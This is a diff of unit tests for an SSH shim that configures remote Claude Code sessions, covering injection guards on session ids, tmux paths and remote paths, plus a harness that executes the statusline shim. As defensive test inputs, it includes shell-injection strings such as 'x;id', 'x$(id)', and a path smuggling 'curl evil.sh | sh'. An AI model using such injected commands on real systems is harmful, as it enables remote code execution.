+// #242 finding F2 (MAJOR, adversarial review round 5): sessionIdSchema had
+// no charset regex, unlike every neighbouring field on this IPC surface
+// (effortLevel, model -- see pty-handlers-effort.test.ts). sessionId reaches
+// ssh-shim.ts's statusLine.command, a string Claude Code runs via `sh -c` on
+// every statusline refresh -- an unsanitised value there is shell-
+// interpolated, so even a value with no quote character (e.g. `x;id`) is
+// enough to inject. Real ids are randomId()'s 24 lowercase-hex chars
+// (src/shared/id.ts), which already satisfy the new charset guard -- this
+// only ever rejects something a real id could never be.
+import { describe, it, expect } from 'vitest'
+import { sessionIdSchema } from '../../../src/main/ipc/pty-handlers'
+
+describe('sessionIdSchema charset guard (#242 finding F2)', () => {
+  it('accepts a real randomId()-shaped session id (24 lowercase hex chars)', () => {
+    expect(() => sessionIdSchema.parse('a1b2c3d4e5f6a1b2c3d4e5f6')).not.toThrow()
+  })
+
+  it('accepts ids carrying an allowlisted prefix + hex, and hyphen/underscore', () => {
+    expect(() => sessionIdSchema.parse('sid-1')).not.toThrow()
+    expect(() => sessionIdSchema.parse('sid_1')).not.toThrow()
+  })
+
+  // Mutation to prove this can fail: remove the `.regex(...)` call from
+  // sessionIdSchema -- every assertion below then passes parse() and the
+  // `.toThrow()` expectations fail.
+  it('rejects a sessionId carrying a shell metacharacter with no quote at all', () => {
+    expect(() => sessionIdSchema.parse('x;id')).toThrow()
+  })
+
+  it('rejects a sessionId carrying a subshell/backtick/pipe', () => {
+    expect(() => sessionIdSchema.parse('x$(id)')).toThrow()
+    expect(() => sessionIdSchema.parse('x`id`')).toThrow()
+    expect(() => sessionIdSchema.parse('x|id')).toThrow()
+    expect(() => sessionIdSchema.parse('x&&id')).toThrow()
+  })
+
+  it('rejects a sessionId containing whitespace', () => {
+    expect(() => sessionIdSchema.parse('x id')).toThrow()
+  })
+
+  it('rejects a sessionId containing a quote', () => {
+    expect(() => sessionIdSchema.parse(`x'id`)).toThrow()
+    expect(() => sessionIdSchema.parse('x"id')).toThrow()
+  })
+})

--- a/tests/unit/providers/claude/ssh-shim-claude-md.test.ts
+++ b/tests/unit/providers/claude/ssh-shim-claude-md.test.ts
@@ -4,9 +4,12 @@
 import { describe, it, expect } from 'vitest'
 import { generateRemoteSetupScript, buildRemoteSessionCleanupCommand } from '../../../../src/main/providers/claude/ssh-shim'
 
+// #242 finding F1 (b): generateRemoteSetupScript now requires a nonce.
+const NONCE = 'testnonce123abc'
+
 describe('generateRemoteSetupScript -- remote CLAUDE.md handling', () => {
   it('never unlinks the remote CLAUDE.md; writes empty when the strip empties it', () => {
-    const script = generateRemoteSetupScript('sess-abc', null)
+    const script = generateRemoteSetupScript('sess-abc', null, undefined, NONCE)
     // The CLAUDE.md cleanup is still present...
     expect(script).toContain("path.join(claudeDir,'CLAUDE.md')")
     // ...but it must not delete the user's file...

--- a/tests/unit/providers/claude/ssh-shim-runtime-harness.test.ts
+++ b/tests/unit/providers/claude/ssh-shim-runtime-harness.test.ts
@@ -1,0 +1,251 @@
+// tests/unit/providers/claude/ssh-shim-runtime-harness.test.ts
+//
+// M7 (adversarial review round 5): the statusline shim (SSH_STATUSLINE_SHIM,
+// ssh-shim.ts) was never EXECUTED by any test before this file -- its only
+// coverage was source-order and substring assertions (see
+// ssh-shim-tmux-statusline.test.ts), which survive any refactor that
+// preserves the TEXT but changes the BEHAVIOUR. This extracts the shim's
+// real source straight out of generateRemoteSetupScript's output (the exact
+// bytes written to the remote, not a re-typed copy) and actually RUNS it,
+// with `require('child_process').execFileSync` and `require('fs')`
+// substituted for scripted stand-ins -- so the shim's own control flow
+// (which branch wins, in which order) is what's under test, not a
+// restatement of it.
+//
+// A real run (adversarial review) also found a false positive this file
+// locks down: on a DETACHED tmux session the shim traced tmux-detached but
+// `ok` stayed false, so it fell through to the ancestor-pts walk and a
+// successful write there logged pts-ok -- a "success" trace for a sentinel
+// nobody attached will ever see. Fixed by setting `ok=true` on that branch
+// (nothing to display is not a failure to retry from a different device).
+import { describe, it, expect } from 'vitest'
+import { EventEmitter } from 'events'
+import * as nodePath from 'path'
+import { generateRemoteSetupScript } from '../../../../src/main/providers/claude/ssh-shim'
+
+const NONCE = 'testnonce123abc'
+
+/**
+ * Pull the shim's REAL source text out of the REAL generateRemoteSetupScript
+ * output -- the shim is embedded there as `fs.writeFileSync(shimPath,
+ * <JSON-string-literal>,{mode:0o755,flag:'wx'})`. JSON.parse the literal to
+ * recover exactly what the remote `node` process would parse back to source;
+ * not a second hand-typed copy of SSH_STATUSLINE_SHIM.
+ *
+ * The write options gained `flag:'wx'` (+ an `rmSync` prefix) when beta hardened
+ * the remote ~/.claude writes against a planted symlink (GHSA-phr3-g5qh-q4v5);
+ * the end marker tracks that exact shape so a future options change surfaces
+ * here instead of silently returning the wrong slice.
+ */
+function extractShimSource(): string {
+  const script = generateRemoteSetupScript('sid-harness', null, undefined, NONCE)
+  const marker = 'fs.writeFileSync(shimPath,'
+  const idx = script.indexOf(marker)
+  expect(idx).toBeGreaterThan(-1)
+  const rest = script.slice(idx + marker.length)
+  const endMarker = ",{mode:0o755,flag:'wx'})"
+  const endIdx = rest.indexOf(endMarker)
+  expect(endIdx).toBeGreaterThan(-1)
+  const literal = rest.slice(0, endIdx)
+  const source: string = JSON.parse(literal)
+  // Strip the shebang line -- valid for `node <file>` execution on the
+  // remote, but `#!` is not valid syntax for the Function constructor this
+  // harness uses to actually run the script in-process.
+  return source.replace(/^#!.*\n/, '')
+}
+
+interface HarnessResult {
+  stdout: string[]
+  stderr: string[]
+  traces: string[]
+  writes: Array<{ path: string; content: string }>
+}
+
+interface HarnessOptions {
+  env: Record<string, string>
+  execFileSync: (file: string, args: string[], opts: unknown) => string
+  /** Paths that should report as a character device via fs.statSync(p).isCharacterDevice(). */
+  charDevicePaths?: Set<string>
+  /** Paths whose fs.writeFileSync call should THROW instead of succeeding. */
+  unwritablePaths?: Set<string>
+}
+
+/**
+ * Actually RUN the shim's real source -- `new Function('require','process',
+ * source)` executes it in this process with `require`/`process` shadowed by
+ * scripted stand-ins (device I/O and the tmux `display-message` call are
+ * the only externally-observable effects a statusLine command has), then
+ * feeds it a minimal valid statusline JSON payload on the faked stdin,
+ * exactly as Claude Code would.
+ */
+function runShim(shimSource: string, opts: HarnessOptions): HarnessResult {
+  const result: HarnessResult = { stdout: [], stderr: [], traces: [], writes: [] }
+  const charDevicePaths = opts.charDevicePaths ?? new Set<string>()
+  const unwritablePaths = opts.unwritablePaths ?? new Set<string>()
+  const fakeFs = {
+    appendFileSync: (_p: string, data: string) => { result.traces.push(String(data)) },
+    writeFileSync: (p: string, data: string) => {
+      if (unwritablePaths.has(p)) {
+        const err = new Error(`EACCES: permission denied, open '${p}'`) as NodeJS.ErrnoException
+        err.code = 'EACCES'
+        throw err
+      }
+      result.writes.push({ path: p, content: String(data) })
+    },
+    statSync: (p: string) => ({ isCharacterDevice: () => charDevicePaths.has(p) }),
+    readlinkSync: () => { throw Object.assign(new Error('ENOENT'), { code: 'ENOENT' }) },
+    readFileSync: () => { throw Object.assign(new Error('ENOENT'), { code: 'ENOENT' }) },
+  }
+  const fakeOs = { homedir: () => '/fake-home' }
+  const fakeChildProcess = { execFileSync: opts.execFileSync }
+  const fakeRequire = (name: string): unknown => {
+    if (name === 'fs') return fakeFs
+    if (name === 'os') return fakeOs
+    if (name === 'path') return nodePath
+    if (name === 'child_process') return fakeChildProcess
+    throw new Error('ssh-shim-runtime-harness: unexpected require: ' + name)
+  }
+  const fakeStdin = Object.assign(new EventEmitter(), { setEncoding: () => {} })
+  const fakeProcess = {
+    env: opts.env,
+    pid: 4242,
+    stdin: fakeStdin,
+    stdout: { write: (s: string) => { result.stdout.push(s); return true } },
+    stderr: { write: (s: string) => { result.stderr.push(s); return true } },
+  }
+  // eslint-disable-next-line no-new-func -- deliberate: this IS the harness.
+  const runner = new Function('require', 'process', shimSource)
+  runner(fakeRequire, fakeProcess)
+  // The shim's 'end' handler runs entirely synchronously (JSON.parse, then
+  // a chain of try/writeFileSync/catch calls, no awaits) -- emit() calls
+  // listeners synchronously, so `result` is fully populated by the time
+  // this function returns.
+  fakeStdin.emit('data', JSON.stringify({ model: { display_name: 'Test Model' }, context_window: {}, cost: {} }))
+  fakeStdin.emit('end')
+  return result
+}
+
+const BASE_ENV = { TMUX: '/tmp/tmux-1000/default,1234,0', CCC_TMUX_BIN: '/fake/tmux', CLAUDE_MULTI_SESSION_ID: 'sid-harness' }
+
+describe('SSH statusline shim -- real runtime harness (#242 M7)', () => {
+  it('extracts real, non-empty shim source containing the $TMUX branch', () => {
+    const src = extractShimSource()
+    expect(src.length).toBeGreaterThan(200)
+    expect(src).toContain('process.env.TMUX')
+  })
+
+  // Mutation to prove this can fail: revert the tmux-detached branch to NOT
+  // set `ok=true` (the pre-fix shape) -- `result.writes` then gains an
+  // entry for '/dev/tty' (the fallback this fix skips), the assertion on
+  // writes.length fails, and the trace-order assertion below also flips.
+  it('a detached tmux session (empty client_tty) is traced and does NOT fall through to any write attempt', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => '', // empty output -> detached
+    })
+    expect(result.traces.some((t) => t.includes('tmux-detached'))).toBe(true)
+    // The false positive this fix closes: no write anywhere (not /dev/tty,
+    // not a pts walk hit) once tmux correctly reports "nothing to display".
+    expect(result.writes).toHaveLength(0)
+    expect(result.traces.some((t) => t.includes('pts-ok'))).toBe(false)
+    expect(result.traces.some((t) => t.includes('tty-fail'))).toBe(false)
+    // The shim always writes a single space to stdout for Claude's own
+    // statusline text, regardless of which OSC path won.
+    expect(result.stdout.join('')).toBe(' ')
+  })
+
+  // Multi-line display-message output: the shim must take ONLY the first
+  // line (`out.split('\n')[0].trim()`), never treat the whole reply as the
+  // device path.
+  it('multi-line display-message output uses only the FIRST line as the tty path', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => '/dev/pts/7\nunexpected-second-line\n',
+      charDevicePaths: new Set(['/dev/pts/7']),
+    })
+    expect(result.writes).toHaveLength(1)
+    expect(result.writes[0].path).toBe('/dev/pts/7')
+    expect(result.traces.some((t) => t.includes('tmux-clienttty-ok') && t.includes('/dev/pts/7'))).toBe(true)
+  })
+
+  // M1 (adversarial review round 5): a display-message reply that is NOT
+  // under /dev/ or NOT a character device must be rejected before
+  // fs.writeFileSync is ever called on it -- writeFileSync would otherwise
+  // CREATE or TRUNCATE an arbitrary regular file at that path.
+  it('M1: rejects a non-device path before ever calling writeFileSync on it, then falls through to /dev/tty', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => '/tmp/not-a-device',
+      // No charDevicePaths entry for '/tmp/not-a-device' -- statSync
+      // reports isCharacterDevice() === false.
+    })
+    expect(result.writes.some((w) => w.path === '/tmp/not-a-device')).toBe(false)
+    expect(result.traces.some((t) => t.includes('tmux-fail') && t.includes('not-under-dev'))).toBe(true)
+    // Falls through to the /dev/tty fallback, which the default fake
+    // succeeds at (no unwritablePaths entry for it).
+    expect(result.writes.some((w) => w.path === '/dev/tty')).toBe(true)
+  })
+
+  it('M1: rejects a /dev/-prefixed path that is not actually a character device', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => '/dev/not-a-chardev',
+      charDevicePaths: new Set(), // explicitly NOT a character device
+    })
+    expect(result.writes.some((w) => w.path === '/dev/not-a-chardev')).toBe(false)
+    expect(result.traces.some((t) => t.includes('tmux-fail') && t.includes('not-a-chardev'))).toBe(true)
+  })
+
+  // An unwritable target: the display-message reply is a genuine character
+  // device (passes M1's validation) but the write itself fails (e.g. a
+  // permissions problem) -- the shim must trace the failure and fall
+  // through to the next tier rather than throwing out of the stdin handler.
+  it('an unwritable (but validated) target is traced as a failure and falls through to /dev/tty', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => '/dev/pts/9',
+      charDevicePaths: new Set(['/dev/pts/9']),
+      unwritablePaths: new Set(['/dev/pts/9']),
+    })
+    expect(result.writes.some((w) => w.path === '/dev/pts/9')).toBe(false)
+    expect(result.traces.some((t) => t.includes('tmux-fail') && t.includes('/dev/pts/9') && t.includes('EACCES'))).toBe(true)
+    expect(result.writes.some((w) => w.path === '/dev/tty')).toBe(true)
+  })
+
+  // The 2s timeout: execFileSync throwing an ETIMEDOUT-shaped error (what
+  // Node's own execFileSync raises when its `timeout` option kills the
+  // child) must be caught and traced, not left to propagate out of the
+  // stdin 'end' handler and crash the statusLine child.
+  it('a hung/half-dead tmux server (execFileSync timeout) is caught, traced, and falls through', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: BASE_ENV,
+      execFileSync: () => {
+        const err = new Error('Command failed') as NodeJS.ErrnoException
+        err.code = 'ETIMEDOUT'
+        throw err
+      },
+    })
+    expect(result.traces.some((t) => t.includes('tmux-fail') && t.includes('ETIMEDOUT'))).toBe(true)
+    expect(result.writes.some((w) => w.path === '/dev/tty')).toBe(true)
+    expect(result.stdout.join('')).toBe(' ') // never crashes; always finishes the handler
+  })
+
+  // Control: outside tmux entirely ($TMUX unset), the tmux branch must not
+  // run at all, and the /dev/tty fallback should be the first (and, here,
+  // successful) attempt.
+  it('outside tmux ($TMUX unset), goes straight to /dev/tty with no tmux-* trace at all', () => {
+    const src = extractShimSource()
+    const result = runShim(src, {
+      env: { CLAUDE_MULTI_SESSION_ID: 'sid-harness' },
+      execFileSync: () => { throw new Error('should never be called') },
+    })
+    expect(result.traces.some((t) => t.includes('tmux'))).toBe(false)
+    expect(result.writes.some((w) => w.path === '/dev/tty')).toBe(true)
+  })
+})

--- a/tests/unit/providers/claude/ssh-shim-tmux-statusline.test.ts
+++ b/tests/unit/providers/claude/ssh-shim-tmux-statusline.test.ts
@@ -1,0 +1,184 @@
+// tests/unit/providers/claude/ssh-shim-tmux-statusline.test.ts
+//
+// #242 item 2: the statusline shim's $TMUX branch must run BEFORE the
+// ancestor-pts walk (findPty) -- under tmux, the pts walk lands on the
+// PANE's pty, which tmux swallows the OSC sentinel into rather than
+// forwarding to the attached client. These tests pin the mechanism (not
+// just its presence) so a revert of the wiring -- dropping the branch,
+// reordering it after the pts walk, or dropping the CCC_TMUX_BIN bake-in --
+// fails loudly instead of leaving the suite green.
+import { describe, it, expect, vi } from 'vitest'
+
+const MOCK_SECRET = 'b'.repeat(64)
+vi.mock('../../../../src/main/conductor-mcp-server', () => ({
+  getConductorMcpPort: () => 19333,
+  getConductorMcpSecret: () => MOCK_SECRET,
+  // GHSA-q83v (landed on beta while this branch was out): the remote config
+  // carries HMAC(secret, sessionId) rather than the raw secret, so the shim
+  // now imports this too. Deterministic stub, matching ssh-shim.test.ts.
+  mcpSessionToken: (sessionId: string) => `tok-${sessionId}`,
+}))
+
+import { generateRemoteSetupScript } from '../../../../src/main/providers/claude/ssh-shim'
+
+// #242 finding F1 (b): generateRemoteSetupScript now requires a nonce.
+const NONCE = 'testnonce123abc'
+
+describe('SSH statusline shim -- $TMUX client_tty branch (#242 item 2)', () => {
+  it('(a) embeds the $TMUX / client_tty branch in the emitted shim', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('process.env.TMUX')
+    expect(script).toContain('#{client_tty}')
+    expect(script).toContain('display-message')
+  })
+
+  it('(b) the $TMUX guard precedes the ancestor-pts walk (findPty call) in the emitted source', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    const tmuxGuardIdx = script.indexOf('process.env.TMUX')
+    // findPty is DEFINED earlier (function declaration); what matters is
+    // where it is CALLED, inside the fallback chain -- `const pts=findPty()`.
+    const findPtyCallIdx = script.indexOf('const pts=findPty()')
+    expect(tmuxGuardIdx).toBeGreaterThan(-1)
+    expect(findPtyCallIdx).toBeGreaterThan(-1)
+    expect(tmuxGuardIdx).toBeLessThan(findPtyCallIdx)
+  })
+
+  it('(b cont.) the $TMUX guard also precedes the /dev/tty attempt', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    const tmuxGuardIdx = script.indexOf('process.env.TMUX')
+    const devTtyIdx = script.indexOf(`fs.writeFileSync('/dev/tty'`)
+    expect(tmuxGuardIdx).toBeGreaterThan(-1)
+    expect(devTtyIdx).toBeGreaterThan(-1)
+    expect(tmuxGuardIdx).toBeLessThan(devTtyIdx)
+  })
+
+  it('(c) bakes CCC_TMUX_BIN into the per-session statusLine command, sourced from the tier-1/2 probe result', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain(`CCC_TMUX_BIN='+tmuxPath+'`)
+    // It rides alongside CLAUDE_MULTI_SESSION_ID in the SAME command string,
+    // not a separate/duplicate statusLine stanza.
+    const parts = script.split(`Object.assign({},sBase,{`)
+    expect(parts.length).toBeGreaterThanOrEqual(2)
+    const sesCfgBody = parts[1].split('})')[0]
+    expect(sesCfgBody).toContain('CLAUDE_MULTI_SESSION_ID=sid-x')
+    expect(sesCfgBody).toContain(`CCC_TMUX_BIN='+tmuxPath+'`)
+  })
+
+  it('(c cont.) the tmux probe (tmuxPath) is declared BEFORE the sesCfg statusLine command references it', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    const probeDeclIdx = script.indexOf(`let tmuxPath=''`)
+    const sesCfgIdx = script.indexOf(`CCC_TMUX_BIN='+tmuxPath+'`)
+    expect(probeDeclIdx).toBeGreaterThan(-1)
+    expect(sesCfgIdx).toBeGreaterThan(-1)
+    expect(probeDeclIdx).toBeLessThan(sesCfgIdx)
+  })
+
+  it('the shim resolves tmuxBin from $CCC_TMUX_BIN, not a hardcoded PATH guess', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('process.env.CCC_TMUX_BIN')
+  })
+
+  it('empty #{client_tty} output (detached session) is traced and skipped, not treated as success', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('tmux-detached')
+  })
+
+  it('a failed tmux server call is traced distinctly from a detached session', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('tmux-fail')
+  })
+
+  it('a successful client_tty write is traced', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('tmux-clienttty-ok')
+  })
+
+  // #242 MINOR (round 2, adversarial review): a wedged/half-dead tmux server
+  // must not block the statusLine child indefinitely on every refresh.
+  it('bounds the display-message call with a timeout (a hung tmux server must not stall the statusline)', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain(`{encoding:'utf8',timeout:2000}`)
+  })
+
+  it('includeStatusLine=false still omits CCC_TMUX_BIN (no statusLine command to carry it)', () => {
+    const script = generateRemoteSetupScript('sid-x', null, { includeStatusLine: false }, NONCE)
+    const parts = script.split(`Object.assign({},sBase,{`)
+    expect(parts.length).toBeGreaterThanOrEqual(2)
+    const sesCfgBody = parts[1].split('})')[0]
+    expect(sesCfgBody).not.toContain('CCC_TMUX_BIN')
+    expect(sesCfgBody).not.toContain('statusLine')
+  })
+
+  // #242 MAJOR (round 2, adversarial review): tmuxPath from either probe
+  // (tier 1 `command -v tmux`, tier 2 ~/.claude/bin/tmux) reaches the
+  // CCC_TMUX_BIN bake-in with no charset guard. A merely awkward value (a
+  // relative path with a space, e.g. `tools/tmux`) survives `sh -c`
+  // re-splitting and executes out of the session's cwd instead of the shim.
+  // The remote script must clear (not pass through) a non-conforming
+  // tmuxPath before that sink, using the SAME character class as
+  // SAFE_TMUX_BIN_RE in src/main/ssh-tmux.ts.
+  //
+  // #242 round-3 correction (I3): the guard now ALSO resets `tmuxClass` to
+  // 'none' alongside `tmuxPath` -- tmuxClass is what crosses back over the
+  // wire in the `setup ok ... tmux=` sentinel, so a value that fails this
+  // charset guard must not leave a stale 'path'/'home' class behind after
+  // tmuxPath itself was cleared.
+  describe('tmuxPath allowlist guard (#242 round 2 MAJOR)', () => {
+    it('(i) emits an allowlist guard that clears a non-conforming tmuxPath AND tmuxClass', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      expect(script).toContain(`if(tmuxPath&&!/^[A-Za-z0-9_./-]+$/.test(tmuxPath)){tmuxPath='';tmuxClass='none'}`)
+    })
+
+    it('(ii) the guard precedes both the CCC_TMUX_BIN bake-in and the "setup ok tmux=" sentinel', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      const guardIdx = script.indexOf(`if(tmuxPath&&!/^[A-Za-z0-9_./-]+$/.test(tmuxPath)){tmuxPath='';tmuxClass='none'}`)
+      const bakeInIdx = script.indexOf(`CCC_TMUX_BIN='+tmuxPath+'`)
+      const sentinelIdx = script.indexOf(`setup ok ${NONCE} tmux=`)
+      expect(guardIdx).toBeGreaterThan(-1)
+      expect(bakeInIdx).toBeGreaterThan(-1)
+      expect(sentinelIdx).toBeGreaterThan(-1)
+      expect(guardIdx).toBeLessThan(bakeInIdx)
+      expect(guardIdx).toBeLessThan(sentinelIdx)
+    })
+
+    it('the guard character class is identical to SAFE_TMUX_BIN_RE in ssh-tmux.ts (the paired sink)', async () => {
+      const { SAFE_TMUX_BIN_RE } = await import('../../../../src/main/ssh-tmux')
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      // Extract the class body embedded in the emitted guard and compare
+      // against the regex object's own source, rather than hardcoding the
+      // class twice in this test -- a future edit to either one flags a
+      // mismatch here instead of the two silently drifting apart.
+      const m = script.match(/if\(tmuxPath&&!\/\^(\[[^\]]+\]\+)\$\/\.test\(tmuxPath\)\)\{tmuxPath='';tmuxClass='none'\}/)
+      expect(m).not.toBeNull()
+      const emittedClass = m![1]
+      expect(SAFE_TMUX_BIN_RE.source).toBe(`^${emittedClass}$`)
+    })
+  })
+
+  // #242 round-3 correction (I3): the sentinel now carries a fixed CLASS
+  // (path/home/none), never the probed path itself -- the wire-reported
+  // path this codebase used to trust for tier 1/2 command construction is
+  // gone by construction, not by a stronger validator.
+  describe('setup ok sentinel carries a tmux CLASS, not a path (#242 finding I3)', () => {
+    it('emits tmux=+tmuxClass in the sentinel, not tmuxPath', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      expect(script).toContain(`process.stdout.write('setup ok ${NONCE} tmux='+tmuxClass+'\\n')`)
+      expect(script).not.toContain(`process.stdout.write('setup ok ${NONCE} tmux='+tmuxPath`)
+    })
+
+    it('sets tmuxClass to "path" when tier 1 (command -v tmux) succeeds', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      expect(script).toContain(`tmuxClass='path'`)
+    })
+
+    it('sets tmuxClass to "home" when tier 2 (~/.claude/bin/tmux) succeeds', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      expect(script).toContain(`tmuxClass='home'`)
+    })
+
+    it('defaults tmuxClass to "none"', () => {
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+      expect(script).toContain(`let tmuxPath='';let tmuxClass='none';`)
+    })
+  })
+})

--- a/tests/unit/providers/claude/ssh-shim.test.ts
+++ b/tests/unit/providers/claude/ssh-shim.test.ts
@@ -16,12 +16,16 @@ vi.mock('../../../../src/main/conductor-mcp-server', () => ({
 }))
 
 import { ClaudeProvider } from '../../../../src/main/providers/claude'
-import { generateRemoteSetupScript, assertSafeRemotePath, getRemoteSetupCommand } from '../../../../src/main/providers/claude/ssh-shim'
+import { generateRemoteSetupScript, assertSafeRemotePath, getRemoteSetupCommand, buildTmuxBinPatchCommand } from '../../../../src/main/providers/claude/ssh-shim'
+
+// #242 finding F1 (b): generateRemoteSetupScript/getRemoteSetupCommand/
+// configureRemoteSettings now require a nonce.
+const NONCE = 'testnonce123abc'
 
 describe('ClaudeProvider SSH-capable surface', () => {
   it('configureRemoteSettings produces a base64-piped node command', () => {
     const p = new ClaudeProvider()
-    const cmd = p.configureRemoteSettings('sid-x', '~/repo', null)
+    const cmd = p.configureRemoteSettings('sid-x', '~/repo', null, undefined, NONCE)
     expect(cmd).toContain('base64 -d | node')
     // `cd --` defends against a path that begins with a dash being parsed as a flag.
     expect(cmd).toContain('cd -- ~/repo')
@@ -79,19 +83,19 @@ describe('SSH remotePath injection defence', () => {
 
   it('getRemoteSetupCommand throws on a metacharacter-laden remotePath rather than interpolating it', () => {
     expect(() =>
-      getRemoteSetupCommand('sid-x', '~; curl evil.sh | sh #', null),
+      getRemoteSetupCommand('sid-x', '~; curl evil.sh | sh #', null, undefined, NONCE),
     ).toThrow(/Refusing to build SSH setup command/)
   })
 
   it('getRemoteSetupCommand uses `cd --` so a leading-dash path is treated as an operand', () => {
-    const cmd = getRemoteSetupCommand('sid-x', '~/repo', null)
+    const cmd = getRemoteSetupCommand('sid-x', '~/repo', null, undefined, NONCE)
     expect(cmd).toContain(' cd -- ~/repo ')
   })
 })
 
 describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   it('writes a per-session mcp-config file with the canonical SSE schema and conductor key', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     // Path: ~/.claude/mcp-<sid>.json
     expect(script).toContain(`path.join(claudeDir,'mcp-sid-x.json')`)
     // The mcpConfig literal is JSON-stringified twice (once for the JSON
@@ -111,18 +115,38 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   })
 
   it('bakes ?cccSessionId=<encoded sid> into the remote MCP URL (P7.7.10 parity)', () => {
-    const script = generateRemoteSetupScript('sid+with space', null)
+    const script = generateRemoteSetupScript('sid+with space', null, undefined, NONCE)
     // encodeURIComponent maps "+" -> "%2B" and " " -> "%20"
     expect(script).toContain('?cccSessionId=sid%2Bwith%20space')
   })
 
   it('bakes this session\'s per-session token into the remote MCP URL (GHSA-q83v)', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     expect(script).toContain('&token=tok-sid-x')
   })
 
+  // #242 finding F2 (MAJOR, adversarial review round 5): ssh-shim.ts:200
+  // used to interpolate the RAW sessionId into statusLine.command -- the one
+  // embedding that skipped `safeSid`, unlike settings-<safeSid>.json and
+  // mcp-<safeSid>.json below it. Reachability is gated at the IPC boundary
+  // (sessionIdSchema, see pty-handlers-sessionid.test.ts) and this is
+  // hardening on the same footing as the #241 username/host fix, not an
+  // embargoed vulnerability -- but the sink itself must still use safeSid.
+  // Mutation to prove this can fail: revert ssh-shim.ts:200's
+  // `${safeSid}` back to `${sessionId}` -- the raw hostile id then appears
+  // verbatim in the statusLine.command string and this assertion fails.
+  it('never embeds a raw hostile sessionId in statusLine.command -- always the sanitised safeSid', () => {
+    const hostile = 'x;id'
+    const script = generateRemoteSetupScript(hostile, null, undefined, NONCE)
+    const parts = script.split(`Object.assign({},sBase,{`)
+    expect(parts.length).toBeGreaterThanOrEqual(2)
+    const sesCfgBody = parts[1].split('})')[0]
+    expect(sesCfgBody).not.toContain(hostile)
+    expect(sesCfgBody).toContain('CLAUDE_MULTI_SESSION_ID=x_id')
+  })
+
   it('strips BOTH legacy conductor-vision AND conductor entries from shared settings + ~/.claude.json', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     // Shared settings.json: both keys defensively removed
     expect(script).toContain(`s.mcpServers['conductor-vision']`)
     expect(script).toContain(`s.mcpServers['conductor']`)
@@ -134,7 +158,7 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   })
 
   it('per-session settings file does NOT carry mcpServers (claude ignores it there)', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     // The clone deletes mcpServers before applying CCC overrides.
     expect(script).toContain(`delete sBase.mcpServers`)
     // sesCfg construction merges sBase + statusLine + (optional hooks); no
@@ -153,7 +177,7 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   // omit the statusLine stanza from the per-session settings while leaving
   // the rest of the setup (hooks, mcp, legacy cleanup) intact.
   it('includes the statusLine stanza by default', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     expect(script).toContain(`statusLine:{type:'command'`)
   })
 
@@ -163,19 +187,22 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   // command claude runs via `sh -c`, so a raw id with a quote/space/
   // metacharacter is remote code execution / command splitting. It must be the
   // sanitised safeSid (a no-op for real hex ids).
+  // #242 inserts `CCC_TMUX_BIN=...` between the sid and ` node`, so assert on
+  // the sanitised sid token followed by a space (the env-var boundary), not the
+  // literal `<sid> node` adjacency the pre-#242 command had.
   it('embeds the sanitised safeSid — not the raw id — in the statusLine command', () => {
-    const script = generateRemoteSetupScript("a'b", null)
-    expect(script).toContain('CLAUDE_MULTI_SESSION_ID=a_b node')
+    const script = generateRemoteSetupScript("a'b", null, undefined, NONCE)
+    expect(script).toContain('CLAUDE_MULTI_SESSION_ID=a_b ')
     expect(script).not.toContain("CLAUDE_MULTI_SESSION_ID=a'b")
   })
 
   it('leaves a real (hex) id untouched in the statusLine command', () => {
-    const script = generateRemoteSetupScript('9f1f147ea02f2cf7d1eec041', null)
-    expect(script).toContain('CLAUDE_MULTI_SESSION_ID=9f1f147ea02f2cf7d1eec041 node')
+    const script = generateRemoteSetupScript('9f1f147ea02f2cf7d1eec041', null, undefined, NONCE)
+    expect(script).toContain('CLAUDE_MULTI_SESSION_ID=9f1f147ea02f2cf7d1eec041 ')
   })
 
